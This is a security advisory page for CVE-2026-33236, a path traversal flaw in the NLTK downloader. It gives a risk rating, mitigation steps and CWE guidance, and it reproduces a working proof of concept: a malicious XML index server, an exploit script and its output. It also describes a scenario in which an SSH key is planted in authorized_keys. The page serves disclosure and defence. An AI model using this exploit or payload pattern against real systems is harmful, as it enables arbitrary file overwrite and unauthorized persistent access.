NLTK's downloader blindly trusts attacker-controlled XML index files, enabling arbitrary file overwrite on any machine running NLP/ML pipelines that download NLTK resources at runtime. Automated training infrastructure and CI/CD pipelines using custom index URLs face direct system file compromise—including SSH key injection and credential overwrites. Audit all NLTK deployments immediately for custom server_index_url usage, pre-bake corpora into container images to eliminate runtime downloads, and enforce egress controls blocking outbound HTTP to NLTK index servers.
What is the risk?
High risk for organizations running NLP pipelines, training infrastructure, or shared research environments. The CVSS score of 8.1 is justified: the flaw is network-reachable, low in complexity, requires no privileges (only that a victim triggers a download), and has a working public PoC. The main constraint on exploitation is that the attacker must control the index NLTK reads from, which is achievable through MitM on HTTP traffic, BGP or DNS hijacking, or social engineering ML engineers into using a malicious custom URL. Cloud ML environments with unfiltered outbound HTTP (SageMaker, Vertex AI, Azure ML) are particularly exposed. The EPSS score is low (0.00043), suggesting a low predicted likelihood of near-term exploitation, but the public PoC significantly lowers the barrier to entry.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| nltk | pip | <= 3.9.2 | No patch |
Do you use nltk? You're affected.
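As a minimal sketch of the version check implied by the table above, the snippet below compares an installed `nltk` version against the listed upper bound. The helper names (`parse_version`, `in_vulnerable_range`, `check_installed`) are hypothetical, and the parsing is deliberately simple: it reads only the first three numeric components and ignores pre-release suffixes.

```python
from importlib import metadata

# Last release listed as vulnerable in the table above.
LAST_VULNERABLE = (3, 9, 2)


def parse_version(text):
    """Turn '3.9.2' into (3, 9, 2); trailing non-numeric suffixes are ignored."""
    parts = []
    for piece in text.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def in_vulnerable_range(version_text):
    """True if the version falls inside the '<= 3.9.2' range."""
    return parse_version(version_text) <= LAST_VULNERABLE


def check_installed(package="nltk"):
    """Return (version, vulnerable), or (None, False) if the package is absent."""
    try:
        version = metadata.version(package)
    except metadata.PackageNotFoundError:
        return None, False
    return version, in_vulnerable_range(version)
```

Calling `check_installed()` inside each virtual environment or container image gives a quick inventory signal. A version above 3.9.2 only means it is outside the listed range, not that a fix is confirmed.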
What should I do?
1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`).
2. Patch: No official patched version had been released as of CVE publication; monitor https://github.com/nltk/nltk for a release.
3. Workaround (preferred): Pre-download all required corpora and bake them into container images; disable runtime NLTK downloads in production entirely.
4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines.
5. Audit: Search the codebase for `Downloader(server_index_url=` with non-official URLs and treat any hit as a critical finding requiring immediate remediation.
6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages).
7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
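The audit step can be sketched as a small source scan. This is an illustrative helper, not an official tool: `find_custom_index_urls` is a hypothetical name, and the value of `OFFICIAL_INDEX` is an assumption about NLTK's default index URL that should be confirmed against the installed `nltk/downloader.py` before relying on it.

```python
import re
from pathlib import Path

# Assumption: NLTK's default index URL; verify against your installed version.
OFFICIAL_INDEX = "https://raw.githubusercontent.com/nltk/nltk_data/gh-pages/index.xml"

# Captures whatever is assigned to server_index_url on the same line.
PATTERN = re.compile(r"server_index_url\s*=\s*(?P<value>[^,)\n]+)")


def find_custom_index_urls(root):
    """Return (path, line_number, line) for each non-official server_index_url."""
    findings = []
    for path in Path(root).rglob("*.py"):
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        for lineno, line in enumerate(text.splitlines(), start=1):
            match = PATTERN.search(line)
            # Variables and non-official literals are both reported for review.
            if match and OFFICIAL_INDEX not in match.group("value"):
                findings.append((str(path), lineno, line.strip()))
    return findings
```

Running `find_custom_index_urls(".")` from a repository root lists candidate lines. Values passed through variables or configuration files are reported too, since the scan cannot tell where they point, so each hit still needs manual review.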
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2026-33236?
CVE-2026-33236 is a path traversal vulnerability (CWE-22) in the NLTK downloader affecting nltk <= 3.9.2. The downloader does not validate the `subdir` and `id` attributes of remote XML index files, so an attacker who controls the index can create directories and create or overwrite files outside the download directory on any machine that downloads NLTK resources at runtime. Pipelines that use a custom `server_index_url` are the most directly exposed. No patched release is available, so the practical defenses are pre-baking corpora into container images and blocking runtime downloads.
Is CVE-2026-33236 actively exploited?
No confirmed active exploitation of CVE-2026-33236 has been reported. Because no patched release exists yet, organizations should apply the workarounds proactively rather than wait for a fix.
How to fix CVE-2026-33236?
1. Inventory: Scan all Python environments and container images for NLTK <= 3.9.2 (`pip show nltk`).
2. Patch: No official patched version had been released as of CVE publication; monitor https://github.com/nltk/nltk for a release.
3. Workaround (preferred): Pre-download all required corpora and bake them into container images; disable runtime NLTK downloads in production entirely.
4. Harden: Enforce egress firewall rules blocking outbound HTTP to NLTK index servers; require HTTPS for any external data source used by ML pipelines.
5. Audit: Search the codebase for `Downloader(server_index_url=` with non-official URLs and treat any hit as a critical finding requiring immediate remediation.
6. Sandbox: Run NLP preprocessing containers with read-only bind mounts on sensitive filesystem paths (/etc, ~/.ssh, site-packages).
7. Detect: Add FIM (file integrity monitoring) alerts for writes to /etc/passwd, ~/.ssh/authorized_keys, and Python site-packages directories by ML service accounts.
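One way to back the pre-bake workaround is a startup check that fails fast when a corpus is missing, instead of falling back to a runtime download. The sketch below uses only the standard library. `missing_resources` and `require_resources` are hypothetical helpers, and the `category/name` layout (for example `tokenizers/punkt`) is an assumption about how the baked data directory is organized.

```python
import os
from pathlib import Path


def missing_resources(data_dir, required):
    """Return the entries of `required` found neither unpacked nor as a .zip."""
    root = Path(data_dir)
    missing = []
    for rel in required:
        base = root / rel
        zipped = base.with_name(base.name + ".zip")
        if not (base.exists() or zipped.exists()):
            missing.append(rel)
    return missing


def require_resources(required, data_dir=None):
    """Raise instead of downloading when baked-in data is incomplete."""
    # NLTK_DATA is the environment variable NLTK reads for extra data paths;
    # the "/usr/share/nltk_data" fallback is only an illustrative default.
    data_dir = data_dir or os.environ.get("NLTK_DATA", "/usr/share/nltk_data")
    missing = missing_resources(data_dir, required)
    if missing:
        raise RuntimeError(f"NLTK data not baked into image: {missing}")
```

Calling `require_resources(["tokenizers/punkt", "corpora/stopwords"])` at service start turns a missing corpus into a build or deploy failure rather than an outbound request to an index server.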
What systems are affected by CVE-2026-33236?
This vulnerability affects the following AI/ML architecture patterns: NLP training pipelines, data preprocessing pipelines, CI/CD ML pipelines, Jupyter notebook environments, containerized ML workloads.
What is the CVSS score for CVE-2026-33236?
CVE-2026-33236 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.00043 (about 0.04%).
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0008.002 Domains
- AML.T0010.001 AI Software
- AML.T0011 User Execution
What are the technical details?
Original Advisory
## Vulnerability Description

The NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to:

1. **Arbitrary Directory Creation**: Create directories at arbitrary locations in the file system
2. **Arbitrary File Creation**: Create arbitrary files
3. **Arbitrary File Overwrite**: Overwrite critical system files (such as `/etc/passwd`, `~/.ssh/authorized_keys`, etc.)

## Vulnerability Principle

### Key Code Locations

**1. XML Parsing Without Validation** (`nltk/downloader.py:253`)

```python
self.filename = os.path.join(subdir, id + ext)
```

- `subdir` and `id` are directly from XML attributes without any validation

**2. Path Construction Without Checks** (`nltk/downloader.py:679`)

```python
filepath = os.path.join(download_dir, info.filename)
```

- Directly uses `filename` which may contain path traversal

**3. Unrestricted Directory Creation** (`nltk/downloader.py:687`)

```python
os.makedirs(os.path.join(download_dir, info.subdir), exist_ok=True)
```

- Can create arbitrary directories outside the download directory

**4. File Writing Without Protection** (`nltk/downloader.py:695`)

```python
with open(filepath, "wb") as outfile:
```

- Can write to arbitrary locations in the file system

### Attack Chain

```
1. Attacker controls remote XML index server
   ↓
2. Provides malicious XML: <package id="passwd" subdir="../../etc" .../>
   ↓
3. Victim executes: downloader.download('passwd')
   ↓
4. Package.fromxml() creates object, filename = "../../etc/passwd.zip"
   ↓
5. _download_package() constructs path: download_dir + "../../etc/passwd.zip"
   ↓
6. os.makedirs() creates directory: download_dir + "../../etc"
   ↓
7. open(filepath, "wb") writes file to /etc/passwd.zip
   ↓
8. System file is overwritten!
```

## Impact Scope

1. **System File Overwrite**

## Reproduction Steps

### Environment Setup

1. Install NLTK

```bash
pip install nltk
```

2. Prepare malicious server and exploit script (see PoC section)

### Reproduction Process

**Step 1: Start malicious server**

```bash
python3 malicious_server.py
```

**Step 2: Run exploit script**

```bash
python3 exploit_vulnerability.py
```

**Step 3: Verify results**

```bash
ls -la /tmp/test_file.zip
```

## Proof of Concept

### Malicious Server (malicious_server.py)

```python
#!/usr/bin/env python3
"""Malicious HTTP Server - Provides XML index with path traversal"""
import os
import tempfile
import zipfile
from http.server import HTTPServer, BaseHTTPRequestHandler

# Create temporary directory
server_dir = tempfile.mkdtemp(prefix="nltk_malicious_")

# Create malicious XML (contains path traversal)
malicious_xml = """<?xml version="1.0"?>
<nltk_data>
  <packages>
    <package id="test_file"
             subdir="../../../../../../../../../tmp"
             url="http://127.0.0.1:8888/test.zip"
             size="100"
             unzipped_size="100"
             unzip="0"/>
  </packages>
</nltk_data>
"""

# Save files
with open(os.path.join(server_dir, "malicious_index.xml"), "w") as f:
    f.write(malicious_xml)

with zipfile.ZipFile(os.path.join(server_dir, "test.zip"), "w") as zf:
    zf.writestr("test.txt", "Path traversal attack!")


# HTTP Handler
class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/malicious_index.xml':
            self.send_response(200)
            self.send_header('Content-type', 'application/xml')
            self.end_headers()
            with open(os.path.join(server_dir, 'malicious_index.xml'), 'rb') as f:
                self.wfile.write(f.read())
        elif self.path == '/test.zip':
            self.send_response(200)
            self.send_header('Content-type', 'application/zip')
            self.end_headers()
            with open(os.path.join(server_dir, 'test.zip'), 'rb') as f:
                self.wfile.write(f.read())
        else:
            self.send_response(404)
            self.end_headers()

    def log_message(self, format, *args):
        pass


# Start server
if __name__ == "__main__":
    port = 8888
    server = HTTPServer(("0.0.0.0", port), Handler)
    print(f"Malicious server started: http://127.0.0.1:{port}/malicious_index.xml")
    print("Press Ctrl+C to stop")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("\nServer stopped")
```

### Exploit Script (exploit_vulnerability.py)

```python
#!/usr/bin/env python3
"""AFO Vulnerability Exploit Script"""
import os
import tempfile


def exploit(server_url="http://127.0.0.1:8888/malicious_index.xml"):
    download_dir = tempfile.mkdtemp(prefix="nltk_exploit_")
    print(f"Download directory: {download_dir}")

    # Exploit vulnerability
    from nltk.downloader import Downloader
    downloader = Downloader(server_index_url=server_url, download_dir=download_dir)
    downloader.download("test_file", quiet=True)

    # Check results
    expected_path = "/tmp/test_file.zip"
    if os.path.exists(expected_path):
        print(f"\n✗ Exploit successful! File written to: {expected_path}")
        print(f"✗ Path traversal attack successful!")
    else:
        print(f"\n? File not found, download may have failed")


if __name__ == "__main__":
    exploit()
```

### Execution Results

```
✗ Exploit successful! File written to: /tmp/test_file.zip
✗ Path traversal attack successful!
```
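On the defensive side, the same index format can be screened before it ever reaches the downloader. The following is a minimal sketch, assuming the index has already been fetched as a string and that legitimate `id` and `subdir` values are single path components made of letters, digits, `_`, `.` and `-` (an assumption, not a rule taken from NLTK). `is_safe_component` and `suspicious_packages` are hypothetical helpers.

```python
import re
import xml.etree.ElementTree as ET

# Assumed allowlist: one path component, no separators, no traversal.
SAFE_COMPONENT = re.compile(r"^[A-Za-z0-9_.\-]+$")


def is_safe_component(value):
    """Accept only a single, plain path component."""
    if not value or value in (".", ".."):
        return False
    return SAFE_COMPONENT.match(value) is not None


def suspicious_packages(index_xml):
    """Return (id, subdir) for every <package> whose attributes look unsafe."""
    root = ET.fromstring(index_xml)
    flagged = []
    for pkg in root.iter("package"):
        pkg_id = pkg.get("id", "")
        subdir = pkg.get("subdir", "")
        if not (is_safe_component(pkg_id) and is_safe_component(subdir)):
            flagged.append((pkg_id, subdir))
    return flagged
```

Run against the PoC index above, this flags the `test_file` entry because its `subdir` contains `/` and `..`. Note that `xml.etree.ElementTree` is not hardened against maliciously constructed XML, so a check like this belongs in an isolated review step rather than in the hot path.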
Exploitation Scenario
An adversary targeting an organization's NLP training pipeline identifies that the pipeline downloads NLTK resources at runtime against an HTTP (non-TLS) index server. The adversary performs a DNS hijack or BGP prefix hijack against the NLTK data hostname, redirecting index requests to a controlled malicious server. The malicious server returns a crafted XML with subdir='../../../.ssh' and id='authorized_keys'. When the nightly training job executes `nltk.download('punkt')`, NLTK constructs the path `download_dir + '../../../.ssh/authorized_keys.zip'`, creates the directory, and writes the attacker's crafted archive. After extraction, the attacker's SSH public key is present in authorized_keys—granting persistent, passwordless access to the ML training server, which typically holds sensitive training data, model artifacts, and credentials for internal APIs and data stores.
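To make the path arithmetic in this scenario concrete, the sketch below reproduces the two joins described in the advisory (`subdir` + `id` + extension, then `download_dir` + filename) and normalizes the result. The download directory `/home/ml/project/data/nltk_data` is a hypothetical example, and `posixpath` is used so the result is the same on any platform.

```python
import posixpath


def resolved_target(download_dir, subdir, package_id, ext=".zip"):
    """Mirror the downloader's joins and show where the write would land."""
    filename = posixpath.join(subdir, package_id + ext)
    return posixpath.normpath(posixpath.join(download_dir, filename))


# Hypothetical download directory three levels below the service account's home.
target = resolved_target(
    "/home/ml/project/data/nltk_data", "../../../.ssh", "authorized_keys"
)
print(target)  # /home/ml/.ssh/authorized_keys.zip
```

The written file carries the package extension, so the initial write lands at `authorized_keys.zip` next to the real key file. How many `../` segments are needed depends entirely on where the download directory sits, which is why the PoC pads its `subdir` with many of them.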
Weaknesses (CWE)
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
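For CWE-22 specifically, a common complement to input allowlisting is a containment check: resolve the final path and refuse it unless it stays under the intended base directory. The sketch below illustrates that general technique and is not NLTK's fix. `safe_join` and `UnsafePathError` are hypothetical names.

```python
import os


class UnsafePathError(ValueError):
    """Raised when a joined path would escape the base directory."""


def safe_join(base_dir, *parts):
    """Join parts under base_dir, rejecting results that resolve outside it."""
    base = os.path.realpath(base_dir)
    # realpath collapses '..' segments and follows symlinks before the check.
    candidate = os.path.realpath(os.path.join(base, *parts))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePathError(f"{candidate!r} escapes {base!r}")
    return candidate
```

With this in place, `safe_join(download_dir, "corpora", "stopwords.zip")` returns a normal path, while `safe_join(download_dir, "../../etc", "passwd.zip")` raises before any directory is created or file opened. An absolute path in `parts` is rejected as well, because `os.path.join` would otherwise discard the base.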
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
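The 8.1 base score can be reproduced from this vector with the CVSS v3.1 base-score equations. The sketch below is a partial calculator that handles only unchanged scope (`S:U`), which is all this vector needs. The metric weights and the constants 6.42 and 8.22 come from the CVSS v3.1 specification; the function names are illustrative.

```python
import math

# CVSS v3.1 metric weights (PR values are those for unchanged scope).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value):
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the base score for a CVSS:3.1 vector with unchanged scope."""
    fields = dict(item.split(":") for item in vector.split("/")[1:])
    if fields["S"] != "U":
        raise NotImplementedError("changed scope is not handled in this sketch")
    w = {name: WEIGHTS[name][fields[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"))  # 8.1
```

Here the impact sub-score is about 5.18 and the exploitability sub-score about 2.84, and their sum of roughly 8.01 rounds up to 8.1. The `UI:R` term is what keeps the score below the 9.1 the same vector would receive with `UI:N`.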
Related Vulnerabilities
| CVE | CVSS | Summary | Shared attack type |
|---|---|---|---|
| CVE-2025-59528 | 10.0 | Flowise: Unauthenticated RCE via MCP config injection | Supply Chain |
| CVE-2024-2912 | 10.0 | BentoML: RCE via insecure deserialization (CVSS 10) | Supply Chain |
| CVE-2023-3765 | 10.0 | MLflow: path traversal allows arbitrary file read | Supply Chain |
| CVE-2025-5120 | 10.0 | smolagents: sandbox escape enables unauthenticated RCE | Supply Chain |
| CVE-2026-21858 | 10.0 | n8n: Input Validation flaw enables exploitation | Code Execution |